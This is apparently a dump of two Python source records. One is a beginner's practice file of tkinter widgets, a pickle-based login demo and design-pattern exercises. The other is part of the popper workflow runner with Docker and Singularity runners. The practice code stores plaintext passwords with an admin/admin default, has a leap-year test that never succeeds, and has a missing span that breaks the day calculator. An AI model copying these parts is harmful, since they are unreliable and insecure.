width=25, height=3)\nl1.pack()\n\nc1 = tk.Checkbutton(window, text='Python', variable=v1, onvalue=1, offvalue=0, command=press_selection)\nc2 = tk.Checkbutton(window, text='C+ ', variable=v2, onvalue=1, offvalue=0, command=press_selection)\nc1.pack()\nc2.pack()\n\n########################################################################################\ndef move_it():\n canvas.move(arc, 1, 2)\n\ncanvas = tk.Canvas(window, bg='pink', height=200, width=200)\n#image_file = tk.PhotoImage(file='01.gif') #import images filed\n#image = canvas.create_image(10, 10, anchor='SW', image=image_file)\n\nx0,y0,x1,y1 = 50,50,80,80\nline = canvas.create_line(x0,y0,x1,y1, fill='white')\noval = canvas.create_oval(x0,y0,x1,y1, fill='red')\narc = canvas.create_arc(x0+30,y0,x1+30,y1, fill='green', start=0, extent=320)\n\ncanvas.pack()\n\n\nbutton = tk.Button(window, text='move', command=move_it).pack()\n\n########################################################################################\nimport tkinter as tk\n\nwindow = tk.Tk()\nwindow.title('my_window')\nwindow.geometry('400x400+500+1400')\n\ncount = 1\ndef do_job():\n global count\n l.config(text='do'+str(count))\n count += 1\n\nmenubar = tk.Menu(window)\n\nfilemenu = tk.Menu(menubar, tearoff=1)\nmenubar.add_cascade(label='File', menu=filemenu)\nfilemenu.add_command(label='New', command=do_job)\nfilemenu.add_command(label='Open', command=do_job)\nfilemenu.add_command(label='Save', command=do_job)\nfilemenu.add_separator() #separator line\nfilemenu.add_command(label='Exit', command=window.quit)\n\neditmenu = tk.Menu(menubar, tearoff=0)\nmenubar.add_cascade(label='Edit', menu=editmenu)\neditmenu.add_command(label='Cut', command=do_job)\neditmenu.add_command(label='Copy', command=do_job)\neditmenu.add_command(label='Paste', command=do_job)\neditmenu.add_separator()\neditmenu.add_command(label='Close', command=window.quit)\n\nsubmenu = tk.Menu(filemenu, tearoff=0)\nfilemenu.add_cascade(label='Import', menu=submenu, underline=0) #add arrow\nsubmenu.add_command(label='Submenu', command=do_job)\n\nsubmenu1 = tk.Menu(submenu, tearoff=0)\nsubmenu.add_cascade(label='Outport', menu=submenu1, underline=0)\nsubmenu1.add_command(label='Submenu1', command=do_job)\n\nwindow.config(menu=menubar)\n\nl = tk.Label(window, bg='cyan', width=25, height=5)\nl.pack() #when use l.config,can not use:l = tk.Label().pack()\n\nwindow.mainloop()\n\n########################################################################################\nl1 = tk.Label(window, text='On the window', bg='cyan', width=25, height=5).pack()\n\nframe = tk.Frame(window)\nframe.pack()\n\nframe_left = tk.Frame(frame)\nframe_right = tk.Frame(frame)\nframe_left.pack(side='left')\nframe_right.pack(side='right')\n\n\nl2 = tk.Label(frame_left, text='On the left', bg='cyan', width=25, height=5).pack()\nl3 = tk.Label(frame_right, text='On the right', bg='cyan', width=25, height=5).pack()\n\n########################################################################################\ndef tan_chuang():\n #tk.messagebox.showinfo(title='Error', message='Mistake')\n #tk.messagebox.showwarning(title='Error', message='Mistake')\n #tk.messagebox.showerror(title='Error', message='Mistake')\n #print(tk.messagebox.askquestion(title='Error', message='Mistake')) #return yes/no\n print(tk.messagebox.askyesno(title='Error', message='Mistake')) #return True/False\n\ntk.Button(window, command=tan_chuang, 
width=30).pack()\n\n########################################################################################\ntk.Label(window).pack(side='top') #pack(side='top/button/left/right')\n\nfor i in range(4):\n for j in range(3):\n tk.Label(window, text=1).grid(row=i, column=j,padx=10, pady=10)\n\ntk.Label(window, text=1).place(x=10, y=100, anchor='nw') #anchor=''nw/n/s/e/w/center\n\n########################################################################################\n#sign window\nimport tkinter as tk\nfrom tkinter import messagebox\nimport pickle\n\nwindow = tk.Tk()\nwindow.title('my_window')\nwindow.geometry('500x400+500+1400')\n\nvar_user_name = tk.StringVar()\nvar_user_pwd = tk.StringVar()\nvar_user_name.set('xxx@gmail.com')\n\n\ndef user_login():\n user_name = var_user_name.get()\n user_pwd = var_user_pwd.get()\n\n try:\n with open('user_info.pickle', 'rb') as user_file:\n user_info = pickle.load(user_file)\n except FileNotFoundError:\n with open('user_info.pickle', 'wb') as user_file:\n user_info = {'admin': 'admin'}\n pickle.dump(user_info, user_file)\n\n if user_name in user_info:\n if user_pwd == user_info[user_name]:\n tk.messagebox.showinfo(title='Welcome', message='How are you?\\n\\n\\t' + user_name)\n else:\n tk.messagebox.showinfo(title='Error', message='password wrong!')\n else:\n is_sign_up = tk.messagebox.askyesno('Welcome', 'you have not sign up,sign up now?')\n if is_sign_up:\n user_sgin_up()\n\n\ndef user_sgin_up():\n def sign_to_my_window():\n\n new_name = var_new_name.get()\n new_pwd = var_new_pwd.get()\n new_pwd_confirm = var_new_pwd_confirm.get()\n\n with open('user_info.pickle', 'rb') as user_file:\n exist_user_info = pickle.load(user_file)\n if new_pwd != new_pwd_confirm:\n tk.messagebox.showerror('Error', 'confirm the same password')\n elif new_name in exist_user_info:\n tk.messagebox.showerror('Error', 'The user has been signed up')\n else:\n exist_user_info[new_name] = new_pwd\n with open('user_info.pickle', 'wb') as user_file:\n pickle.dump(exist_user_info, user_file)\n tk.messagebox.showinfo('Welcome', 'succeed')\n window_sign_up.destroy()\n\n window_sign_up = tk.Toplevel(window)\n window_sign_up.geometry('350x200+600+1500')\n window_sign_up.title('Sign up window')\n\n var_new_name = tk.StringVar()\n var_new_pwd = tk.StringVar()\n var_new_pwd_confirm = tk.StringVar()\n var_new_name.set('xxx@gmail.com')\n\n tk.Label(window_sign_up, text='User name', bg='pink').place(x=75, y=50)\n tk.Label(window_sign_up, text='Password', bg='pink').place(x=80, y=80)\n tk.Label(window_sign_up, text='Password confirm', bg='pink').place(x=40, y=110)\n\n tk.Entry(window_sign_up, textvariable=var_new_name).place(x=150, y=50)\n tk.Entry(window_sign_up, textvariable=var_new_pwd).place(x=150, y=80)\n tk.Entry(window_sign_up, textvariable=var_new_pwd_confirm).place(x=150, y=110)\n\n tk.Button(window_sign_up, text='Yes', width=6, command=sign_to_my_window).place(x=80, y=160)\n tk.Button(window_sign_up, text='Cancel', command=window_sign_up.destroy).place(x=230, y=160)\n\n\ncanvas = tk.Canvas(window, height=200, width=500, bg='pink')\n# image_file = tk.PhotoImage(file='xxx')\n# image = canvas.create_image(0,0, anchor='nw', image=image_file)\ncanvas.create_oval(200, 200, 100, 100, fill='green')\ncanvas.create_oval(100, 100, 400, 400, fill='green')\ncanvas.pack(side='top')\n\nlabel_name = tk.Label(window, text='User name', bg='cyan').place(x=100, y=270, anchor='sw')\nlabel_pwd = tk.Label(window, text='Password', bg='cyan').place(x=100, y=300)\n\nentry_name = tk.Entry(window, 
textvariable=var_user_name, font=('Arial', 14)).place(x=170, y=270, anchor='sw')\nentry_pwd = tk.Entry(window, textvariable=var_user_pwd, font=('Arial', 14), show='*').place(x=170, y=300)\n\nbutton_login = tk.Button(window, text='Log in', command=user_login).place(x=100, y=350)\nbutton_signout = tk.Button(window, text='Sign up', command=user_sgin_up).place(x=350, y=350)\n\nwindow.mainloop()\n\n########################################################################################\nimport time\n\nstart1 = time.time()\n\nfor i in range(1000):\n result = []\n for j in range(20000):\n result.append(i*1000 + j*10)\n\nend1 = time.time()\n\nprint(end1 - start1)\n\n\nstart2 = time.time()\n\nfor i in range(1000):\n result = []\n x = i*1000\n for j in range(20000):\n result.append(x + j*10)\n\nend2 = time.time()\n\nprint(end2 - start2)\n\n\n########################################################################################\ndef func(n):\n if n==1 or n==0:\n return 1\n return n*func(n-1)\n\n\nprint(list(func(x) for x in range(0,15)))\n#for x in range(0,15):\n #print(x,'\\t!= : ',func(x))\n\n########################################################################################\ndef func(ischinese, first_name, last_name):\n\n def inner(first_name, last_name):\n print('{0} {1}'.format(first_name, last_name))\n\n if ischinese:\n inner(first_name, last_name)\n else:\n inner(last_name, first_name)\n\nfunc(False, 'DUCK', 'BUBBY')\nfunc(True, '李', '凉')\n\n########################################################################################\n#组合,Demo()是Stu()的一个属性\nclass Demo:\n\n def say(self):\n print('xxx')\n\nclass Stu():\n\n def __init__(self, a):\n self.a = a\n\nStu(Demo()).a.say()\n\n########################################################################################\n#Factory pattern\nclass Factory():\n\n def creat_car(self, brand):\n if brand == 'BMW':\n print('BMW is building...')\n elif brand == 'BENZ':\n print('BENZ is building...')\n elif brand == 'BYD':\n print('BYD is building...')\n else:\n print('Error')\n\n\ncar1 = Factory().creat_car('BMW')\ncar2 = Factory().creat_car('B')\n\n#Singleton pattern\nclass MySingleton():\n\n __obj = None\n __init_flag = True\n\n def __new__(cls, *args, **kwargs): #cls.__obj == class().__obj\n if cls.__obj == None:\n cls.__obj = object.__new__(cls)\n return cls.__obj\n\n\n def __init__(self, name):\n if MySingleton.__init_flag:\n print('init.....')\n self.name = name\n MySingleton.__init_flag = False\n\na = MySingleton('aa')\nb = MySingleton('bb')\nprint(a)\nprint(b)\n\n#Singleton and Factory\nclass SingletonFactory():\n\n __obj = None\n __init_flag = True\n\n def __new__(cls, *args, **kwargs):\n if cls.__obj == None:\n cls.__obj = object.__new__(cls)\n return cls.__obj\n\n def creat_car(self, brand):\n if brand == 'BMW':\n print('BMW is building...')\n elif brand == 'BENZ':\n print('BENZ is building...')\n elif brand == 'BYD':\n print('BYD is building...')\n else:\n print('Error')\n\n def __init__(self):\n if SingletonFactory.__init_flag == True:\n print('BUILDING')\n SingletonFactory.__init_flag = False\n\ncar3 = SingletonFactory()\ncar3.creat_car('BMW')\ncar4 = SingletonFactory()\ncar4.creat_car('BENZ')\nprint(car3)\nprint(car4)\n\n\n########################################################################################\nyear = int(input('year:'))\nmonth = int(input('month:'))\nday = int(input('day:'))\n\nadd_days = (0,31,59,90,120,151,181,212,243,273,304,334)\n\n\nif (year % 4 == 0) and (year % 400 == 0) and (year % 100 != 0):\n extra = 
1\nelse:\n extra = 0\n\nif 0= listtime[-1]:\n print(timedict[listtime[-1]])\n break\n\n########################################################################################\nimport time\n\nmusicLrc = '''\n[00:08:50][00:19:21][00:32:21]1111\n[00:56:21][01:02:21]2222\n[01:13:21]33333\n[02:17:21]44444\n[02:56:21]55555\n[03:14:21]66666\n[03:25:21]7777777\n[03:31:21]888888\n'''\nlrcLineList = musicLrc.splitlines()\ntimedict = {}\n\nfor lrcLine in lrcLineList:\n lrclinelist = lrcLine.split(']') #[00:08:50, [00:19:21, [00:32:21 , 1111\n for i in range(len(lrclinelist) - 1):\n timeStr = lrclinelist[i][1:]\n timeList = timeStr.split(':')\n time1 = float(timeList[0])*60 +float(timeList[1]) #不能使用float(timeList[0]*60)\n timedict[time1] = lrclinelist[-1]\n\n\nlisttime = []\nfor i in timedict.keys():\n listtime.append(i)\nprint(timedict)\n\ngetTime = 0\nwhile True:\n for n in range(len(listtime)):\n if getTime < listtime[n]:\n break\n\n lrc = timedict.get(listtime[n])\n\n if lrc == None:\n pass\n else:\n print(lrc)\n\n time.sleep(0.05)\n getTime += 1\n\n########################################################################################\n#decorator\ndef outer(func):\n def inner(age):\n if age < 0:\n age = 0\n func(age)\n return inner\n\n@outer #say = outer(say)\ndef say(age): #上面有while True:所以unreachable\n print(age)\nsay = outer(say)(15)\n\n########################################################################################\n","sub_path":"python/Practice/th.py","file_name":"th.py","file_ext":"py","file_size_in_byte":36375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"252769077","text":"from __future__ import unicode_literals\nimport multiprocessing as mp\nimport os\nimport shutil\nimport subprocess\nimport time\nfrom builtins import dict, input, str\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom distutils.dir_util import copy_tree\n\nimport docker\nimport hcl\nimport popper.cli\nfrom popper import scm, utils as pu\nfrom spython.main import Client as sclient\n\n\nclass Workflow(object):\n \"\"\"A GHA workflow.\n \"\"\"\n\n def __init__(self, wfile, workspace, quiet, debug, dry_run,\n reuse, parallel):\n wfile = pu.find_default_wfile(wfile)\n\n with open(wfile, 'r') as fp:\n self.wf = hcl.load(fp)\n\n self.workspace = workspace\n self.debug = debug\n if debug:\n self.quiet = False\n else:\n self.quiet = quiet\n self.dry_run = dry_run\n self.reuse = reuse\n self.parallel = parallel\n\n self.actions_cache_path = os.path.join('/', 'tmp', 'actions')\n self.validate_syntax()\n self.check_secrets()\n self.normalize()\n self.complete_graph()\n\n def validate_syntax(self):\n \"\"\" Validates the .workflow file.\n \"\"\"\n resolves_present = False\n uses_present = False\n if not self.wf.get('workflow', None):\n pu.fail('A workflow block must be present\\n')\n else:\n for _, wf_block in dict(self.wf['workflow']).items():\n if wf_block.get('resolves', None):\n resolves_present = True\n if not resolves_present:\n pu.fail('[resolves] attribute must be present\\n')\n if not self.wf.get('action', None):\n pu.fail('Atleast one action block must be present\\n')\n else:\n for _, a_block in self.wf['action'].items():\n if a_block.get('uses', None):\n uses_present = True\n if not uses_present:\n pu.fail('[uses] attribute must be present\\n')\n\n def is_list_of_strings(self, lst):\n try:\n basestring\n except UnboundLocalError:\n basestring = str\n return bool(lst) and isinstance(lst, list) and all(\n isinstance(elem, basestring) 
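# A compact sketch of the decorator section above: @outer is the same as
# rebinding say = outer(say), so the decorated function is called directly
# (the extra outer(say)(15) re-wrap in the snippet is redundant).
# clamp_age is an illustrative name; functools.wraps preserves metadata.
import functools

def clamp_age(func):
    @functools.wraps(func)
    def inner(age):
        func(max(age, 0))           # clamp negative ages to 0
    return inner

@clamp_age                          # same as: say = clamp_age(say)
def say(age):
    print(age)

say(15)    # 15
say(-3)    # 0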
for elem in lst)\n\n def normalize(self):\n \"\"\"normalize the dictionary representation of the workflow\"\"\"\n\n # modify from this:\n #\n # \"workflow\": {\n # \"test-and-deploy\": {\n # \"resolves\": \"deploy\"\n # }\n # }\n #\n # to this:\n #\n # \"workflow\": {\n # \"name\": \"test-and-deploy\",\n # \"on\": \"push\",\n # \"resolves\": \"deploy\"\n # }\n for wf_name, wf_block in dict(self.wf['workflow']).items():\n self.wf['name'] = wf_name\n self.wf['on'] = wf_block.get('on', 'push')\n self.wf['resolves'] = wf_block['resolves']\n\n # python 2 to 3 compatibility\n try:\n basestring\n except UnboundLocalError:\n basestring = str\n\n # create a list for all attributes that can be either string or list\n if isinstance(self.wf['resolves'], basestring):\n self.wf['resolves'] = [self.wf['resolves']]\n elif not self.is_list_of_strings(self.wf['resolves']):\n pu.fail('[resolves] must be a list of strings or a string\\n')\n if not isinstance(self.wf['on'], basestring):\n pu.fail('[on] attribute must be a string\\n')\n for _, a_block in self.wf['action'].items():\n if not isinstance(a_block['uses'], basestring):\n pu.fail('[uses] attribute must be a string\\n')\n if a_block.get('needs', None):\n if isinstance(a_block['needs'], basestring):\n a_block['needs'] = [a_block['needs']]\n elif not self.is_list_of_strings(a_block['needs']):\n pu.fail(\n '[needs] attribute must be a list of strings \\\n or a string\\n')\n if a_block.get('runs', None):\n if isinstance(a_block['runs'], basestring):\n a_block['runs'] = [a_block['runs']]\n elif not self.is_list_of_strings(a_block['runs']):\n pu.fail(\n '[runs] attribute must be a list of strings \\\n or a string\\n')\n if a_block.get('args', None):\n if isinstance(a_block['args'], basestring):\n a_block['args'] = a_block['args'].split()\n elif not self.is_list_of_strings(a_block['args']):\n pu.fail(\n '[args] attribute must be a list of strings \\\n or a string\\n')\n if a_block.get('env', None):\n if not isinstance(a_block['env'], dict):\n pu.fail('[env] attribute must be a dict\\n')\n if a_block.get('secrets', None):\n if not self.is_list_of_strings(a_block['secrets']):\n pu.fail('[secrets] attribute must be a list of strings\\n')\n\n def complete_graph(self):\n \"\"\"A GHA workflow is defined by specifying edges that point to the\n previous nodes they depend on. To make the workflow easier to process,\n we add forward edges. 
We also obtains the root nodes.\n \"\"\"\n root_nodes = set()\n\n for name, a_block in self.wf['action'].items():\n\n a_block['name'] = name\n\n for n in a_block.get('needs', []):\n if not self.wf['action'][n].get('next', None):\n self.wf['action'][n]['next'] = set()\n self.wf['action'][n]['next'].add(name)\n\n if not a_block.get('needs', None):\n root_nodes.add(name)\n\n self.wf['root'] = root_nodes\n\n def check_secrets(self):\n if self.dry_run:\n return\n for _, a in self.wf['action'].items():\n for s in a.get('secrets', []):\n if s not in os.environ:\n if os.environ.get('CI') == \"true\":\n pu.fail('Secret {} not defined\\n.'.format(s))\n else:\n val = input(\"Enter the value for {0}:\\n\".format(s))\n os.environ[s] = val\n\n def download_actions(self):\n \"\"\"Clone actions that reference a repository.\"\"\"\n cloned = set()\n infoed = False\n for _, a in self.wf['action'].items():\n if ('docker://' in a['uses'] or\n 'shub://' in a['uses'] or\n './' in a['uses']):\n continue\n\n url, service, user, repo, action, action_dir, version = pu.parse(\n a['uses'])\n\n repo_parent_dir = os.path.join(\n self.actions_cache_path, service, user\n )\n a['repo_dir'] = os.path.join(repo_parent_dir, repo)\n a['action_dir'] = action_dir\n if '{}/{}'.format(user, repo) in cloned:\n continue\n\n if not os.path.exists(repo_parent_dir):\n os.makedirs(repo_parent_dir)\n\n if not self.dry_run:\n if not infoed:\n pu.info('[popper] cloning actions from repositories\\n')\n infoed = True\n\n scm.clone(url, user, repo, repo_parent_dir, version,\n debug=self.debug)\n\n cloned.add('{}/{}'.format(user, repo))\n\n def instantiate_runners(self):\n \"\"\"Factory of ActionRunner instances, one for each action\"\"\"\n for _, a in self.wf['action'].items():\n if 'docker://' in a['uses']:\n a['runner'] = DockerRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n continue\n\n if 'shub://' in a['uses']:\n a['runner'] = SingularityRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n continue\n\n if './' in a['uses']:\n if os.path.exists(os.path.join(a['uses'], 'Dockerfile')):\n a['runner'] = DockerRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n elif os.path.exists(os.path.join(a['uses'],\n 'singularity.def')):\n a['runner'] = SingularityRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n else:\n a['runner'] = HostRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n continue\n\n dockerfile_path = os.path.join(a['repo_dir'], a['action_dir'],\n 'Dockerfile')\n singularityfile_path = os.path.join(a['repo_dir'], a['action_dir'],\n 'singularity.def')\n\n if os.path.exists(dockerfile_path):\n a['runner'] = DockerRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n elif os.path.exists(singularityfile_path):\n a['runner'] = SingularityRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n else:\n a['runner'] = HostRunner(\n a, self.workspace, self.env,\n self.quiet, self.debug, self.dry_run)\n\n def run(self, action_name=None, reuse=False, parallel=False):\n \"\"\"Run the pipeline or a specific action\"\"\"\n os.environ['WORKSPACE'] = self.workspace\n\n if scm.get_user():\n repo_id = '{}/{}'.format(scm.get_user(), scm.get_name())\n else:\n repo_id = 'unknown'\n\n self.env = {\n 'GITHUB_WORKSPACE': self.workspace,\n 'GITHUB_WORKFLOW': self.wf['name'],\n 'GITHUB_ACTOR': 'popper',\n 'GITHUB_REPOSITORY': repo_id,\n 'GITHUB_EVENT_NAME': 
self.wf['on'],\n 'GITHUB_EVENT_PATH': '/{}/{}'.format(self.workspace,\n 'workflow/event.json'),\n 'GITHUB_SHA': scm.get_sha(self.debug),\n 'GITHUB_REF': scm.get_ref()\n }\n\n for e in dict(self.env):\n self.env.update({e.replace('GITHUB_', 'POPPER_'): self.env[e]})\n\n self.download_actions()\n self.instantiate_runners()\n\n if action_name:\n self.wf['action'][action_name]['runner'].run(reuse)\n else:\n for s in self.get_stages():\n self.run_stage(s, reuse, parallel)\n\n def run_stage(self, stage, reuse=False, parallel=False):\n if parallel:\n with ThreadPoolExecutor(max_workers=mp.cpu_count()) as ex:\n flist = {\n ex.submit(self.wf['action'][a]['runner'].run, reuse):\n a for a in stage\n }\n popper.cli.flist = flist\n for future in as_completed(flist):\n future.result()\n pu.info('Action ran successfully !\\n')\n else:\n for action in stage:\n self.wf['action'][action]['runner'].run(reuse)\n\n @pu.threadsafe_generator\n def get_stages(self):\n \"\"\"Generator of stages. A stages is a list of actions that can be\n executed in parallel.\n \"\"\"\n current_stage = self.wf['root']\n\n while current_stage:\n yield current_stage\n next_stage = set()\n for n in current_stage:\n next_stage.update(self.wf['action'][n].get('next', set()))\n current_stage = next_stage\n\n @staticmethod\n def import_from_repo(path, project_root):\n parts = pu.get_parts(path)\n if len(parts) < 3:\n pu.fail(\n 'Required url format: \\\n //[/folder[/wf.workflow]]'\n )\n\n url, service, user, repo, _, _, version = pu.parse(path)\n cloned_project_dir = os.path.join(\"/tmp\", service, user, repo)\n scm.clone(url, user, repo, os.path.dirname(\n cloned_project_dir), version\n )\n\n if len(parts) == 3:\n ptw_one = os.path.join(cloned_project_dir, \"main.workflow\")\n ptw_two = os.path.join(cloned_project_dir, \".github/main.workflow\")\n if os.path.isfile(ptw_one):\n path_to_workflow = ptw_one\n elif os.path.isfile(ptw_two):\n path_to_workflow = ptw_two\n else:\n pu.fail(\"Unable to find a .workflow file\")\n elif len(parts) >= 4:\n path_to_workflow = os.path.join(\n cloned_project_dir, '/'.join(parts[3:])).split(\"@\")[0]\n if not os.path.basename(path_to_workflow).endswith('.workflow'):\n path_to_workflow = os.path.join(\n path_to_workflow, 'main.workflow')\n if not os.path.isfile(path_to_workflow):\n pu.fail(\"Unable to find a .workflow file\")\n\n shutil.copy(path_to_workflow, project_root)\n pu.info(\"Successfully imported from {}\\n\".format(path_to_workflow))\n\n with open(path_to_workflow, 'r') as fp:\n wf = hcl.load(fp)\n\n action_paths = list()\n if wf.get('action', None):\n for _, a_block in wf['action'].items():\n if a_block['uses'].startswith(\"./\"):\n action_paths.append(a_block['uses'])\n\n action_paths = set([a.split(\"/\")[1] for a in action_paths])\n for a in action_paths:\n copy_tree(os.path.join(cloned_project_dir, a),\n os.path.join(project_root, a))\n pu.info(\"Copied {} to {}...\\n\".format(os.path.join(\n cloned_project_dir, a), project_root))\n\n\nclass ActionRunner(object):\n \"\"\"An action runner.\n \"\"\"\n\n def __init__(self, action, workspace, env, quiet, debug, dry_run):\n self.action = action\n self.workspace = workspace\n self.env = env\n self.quiet = quiet\n self.debug = debug\n self.dry_run = dry_run\n self.msg_prefix = \"DRYRUN: \" if dry_run else \"\"\n\n if not os.path.exists(self.workspace):\n os.makedirs(self.workspace)\n\n self.log_path = os.path.join(self.workspace, 'popper_logs')\n if not os.path.exists(self.log_path):\n os.makedirs(self.log_path)\n self.log_filename = 
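# A self-contained sketch of the graph handling in complete_graph() and
# get_stages() above: invert the `needs` edges into forward edges, treat
# actions without needs as roots, then walk level by level; each level is a
# stage whose actions could run in parallel. The action names are made up.
actions = {
    'lint':   {'needs': []},
    'build':  {'needs': []},
    'test':   {'needs': ['build']},
    'deploy': {'needs': ['test']},
}
nxt = {name: set() for name in actions}
roots = set()
for name, a in actions.items():
    for dep in a['needs']:
        nxt[dep].add(name)          # forward edge: dep -> name
    if not a['needs']:
        roots.add(name)

stage = roots
while stage:
    print(sorted(stage))            # ['build', 'lint'] / ['test'] / ['deploy']
    stage = set().union(*(nxt[n] for n in stage))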
os.path.join(\n self.log_path, self.action['name'].replace(' ', '-'))\n\n def run(self, reuse=False):\n raise NotImplementedError(\n \"This method is required to be implemented in derived classes.\"\n )\n\n\nclass DockerRunner(ActionRunner):\n def __init__(self, action, workspace, env, q, d, dry):\n super(DockerRunner, self).__init__(action, workspace, env, q, d, dry)\n self.cid = self.action['name'].replace(' ', '_')\n self.docker_client = docker.from_env()\n self.container = None\n\n def run(self, reuse=False):\n build = True\n\n if 'docker://' in self.action['uses']:\n tag = self.action['uses'].replace('docker://', '')\n build = False\n elif './' in self.action['uses']:\n action_dir = os.path.basename(\n self.action['uses'].replace('./', ''))\n\n if self.env['GITHUB_REPOSITORY'] == 'unknown':\n repo_id = ''\n else:\n repo_id = self.env['GITHUB_REPOSITORY']\n\n if action_dir:\n repo_id += '/'\n\n tag = (\n 'popper/' + repo_id + action_dir + ':' + self.env['GITHUB_SHA']\n )\n\n dockerfile_path = os.path.join(os.getcwd(), self.action['uses'])\n else:\n tag = '/'.join(self.action['uses'].split('/')[:2])\n dockerfile_path = os.path.join(self.action['repo_dir'],\n self.action['action_dir'])\n\n if not reuse:\n if self.docker_exists():\n self.docker_rm()\n if build:\n self.docker_build(tag, dockerfile_path)\n else:\n self.docker_pull(tag)\n self.docker_create(tag)\n else:\n if not self.docker_exists():\n if build:\n self.docker_build(tag, dockerfile_path)\n else:\n self.docker_pull(tag)\n self.docker_create(tag)\n\n if self.container is not None:\n popper.cli.docker_list.append(self.container)\n e = self.docker_start()\n\n if e != 0:\n pu.fail('Action {} failed!\\n'.format(self.action['name']))\n\n def docker_exists(self):\n if self.dry_run:\n return True\n containers = self.docker_client.containers.list(\n all=True, filters={'name': self.cid})\n\n filtered_containers = [c for c in containers if c.name == self.cid]\n if len(filtered_containers):\n self.container = filtered_containers[0]\n return True\n\n return False\n\n def docker_rm(self):\n if self.dry_run:\n return\n self.container.remove(force=True)\n\n def docker_create(self, img):\n pu.info('{}[{}] docker create {} {}\\n'.format(\n self.msg_prefix,\n self.action['name'], img, ' '.join(self.action.get('args', ''))\n ))\n if self.dry_run:\n return\n env_vars = self.action.get('env', {})\n\n for s in self.action.get('secrets', []):\n env_vars.update({s: os.environ.get(s)})\n\n for e, v in self.env.items():\n env_vars.update({e: v})\n env_vars.update({'HOME': os.environ['HOME']})\n volumes = [self.workspace, os.environ['HOME'], '/var/run/docker.sock']\n if self.debug:\n pu.info('DEBUG: Invoking docker_create() method\\n')\n self.container = self.docker_client.containers.create(\n image=img,\n command=self.action.get('args', None),\n name=self.cid,\n volumes={v: {'bind': v} for v in volumes},\n working_dir=self.workspace,\n environment=env_vars,\n entrypoint=self.action.get('runs', None),\n detach=True\n )\n\n def docker_start(self):\n pu.info('{}[{}] docker start \\n'.format(self.msg_prefix,\n self.action['name']))\n if self.dry_run:\n return 0\n self.container.start()\n if self.quiet:\n sleep_time = 0.25\n while self.container.status == 'running':\n if sleep_time < 10:\n sleep_time *= 2\n if self.debug:\n pu.info('DEBUG: sleeping for {}\\n'.format(sleep_time))\n else:\n pu.info('.')\n\n time.sleep(sleep_time)\n else:\n def b(t):\n if isinstance(t, bytes):\n return t.decode('utf-8')\n return t\n cout = self.container.logs(stream=True)\n for 
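# A minimal docker-py sketch of the create/start/stream-logs/wait sequence
# used by DockerRunner above. It assumes a reachable Docker daemon and the
# public hello-world image; both are assumptions, not part of this file.
import docker

client = docker.from_env()
container = client.containers.create('hello-world', detach=True)
container.start()
for chunk in container.logs(stream=True):   # byte chunks, as in docker_start
    print(chunk.decode('utf-8'), end='')
print('exit code:', container.wait()['StatusCode'])
container.remove()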
l in cout:\n pu.info(b(l))\n\n return self.container.wait()['StatusCode']\n\n def docker_pull(self, img):\n pu.info('{}[{}] docker pull {}\\n'.format(self.msg_prefix,\n self.action['name'], img))\n if self.dry_run:\n return\n self.docker_client.images.pull(repository=img)\n\n def docker_build(self, tag, path):\n pu.info('{}[{}] docker build -t {} {}\\n'.format(\n self.msg_prefix, self.action['name'], tag, path))\n if self.dry_run:\n return\n self.docker_client.images.build(path=path, tag=tag, rm=True, pull=True)\n\n\nclass SingularityRunner(ActionRunner):\n \"\"\"Singularity Action Runner Class\n \"\"\"\n\n def __init__(self, action, workspace, env, q, d, dry):\n super(SingularityRunner, self).__init__(action, workspace, env,\n q, d, dry)\n self.pid = self.action['name'].replace(' ', '_')\n sclient.quiet = q\n sclient.debug = d\n\n def run(self, reuse=False):\n \"\"\"Runs the singularity action\n \"\"\"\n build = True\n if 'shub://' in self.action['uses']:\n image = self.action['uses']\n build = False\n elif './' in self.action['uses']:\n image = 'action/' + os.path.basename(self.action['uses'])\n singularityfile_path = os.path.join(\n os.getcwd(), self.action['uses'])\n else:\n image = '/'.join(self.action['uses'].split('/')[:2])\n singularityfile_path = os.path.join(self.action['repo_dir'],\n self.action['action_dir'])\n\n self.image_name = self.pid + '.simg'\n if not reuse:\n if self.singularity_exists():\n self.singularity_rm()\n if build:\n self.singularity_build(singularityfile_path)\n else:\n self.singularity_pull(image)\n else:\n if not self.singularity_exists():\n if build:\n self.singularity_build(singularityfile_path)\n else:\n self.singularity_pull(image)\n\n e = self.singularity_start()\n\n if e != 0:\n pu.fail('Action {} failed!\\n'.format(self.action['name']))\n\n def singularity_exists(self):\n \"\"\"Check whether an instance exists or not.\n \"\"\"\n if os.path.exists(self.image_name):\n return True\n return False\n\n def singularity_rm(self):\n \"\"\"Stops and removes an instance.\n \"\"\"\n os.remove(self.image_name)\n\n def singularity_pull(self, image):\n \"\"\"Pulls an docker or singularity images from hub.\n \"\"\"\n pu.info('{}[{}] singularity pull {}\\n'.format(\n self.msg_prefix, self.action['name'], image)\n )\n if not self.dry_run:\n sclient.pull(image, name=self.image_name)\n\n def singularity_build(self, path):\n \"\"\"Builds an image from a recipefile.\n \"\"\"\n recipefile_path = os.path.join(path, 'singularity.def')\n pu.info('{}[{}] singularity build {} {}\\n'.format(\n self.msg_prefix, self.action['name'],\n self.image_name, recipefile_path)\n )\n if not self.dry_run:\n sclient.build(recipefile_path, self.image_name)\n\n def singularity_start(self):\n \"\"\"Starts a singularity instance based on the image.\n \"\"\"\n env_vars = self.action.get('env', {})\n\n for s in self.action.get('secrets', []):\n env_vars.update({s: os.environ[s]})\n\n for e, v in self.env.items():\n env_vars.update({e: v})\n\n env_vars.update({'HOME': os.environ['HOME']})\n\n # sets the env variables\n for k, v in env_vars.items():\n sclient.setenv(k, v)\n args = self.action.get('args', None)\n runs = self.action.get('runs', None)\n\n ecode = None\n bind_list = [self.workspace, os.environ['HOME']]\n\n if runs:\n info = '{}[{}] singularity exec {} {}\\n'.format(\n self.msg_prefix, self.action['name'],\n self.image_name, runs)\n commands = runs\n start = sclient.execute\n else:\n info = '{}[{}] singularity run {} {}\\n'.format(\n self.msg_prefix, self.action['name'],\n self.image_name, 
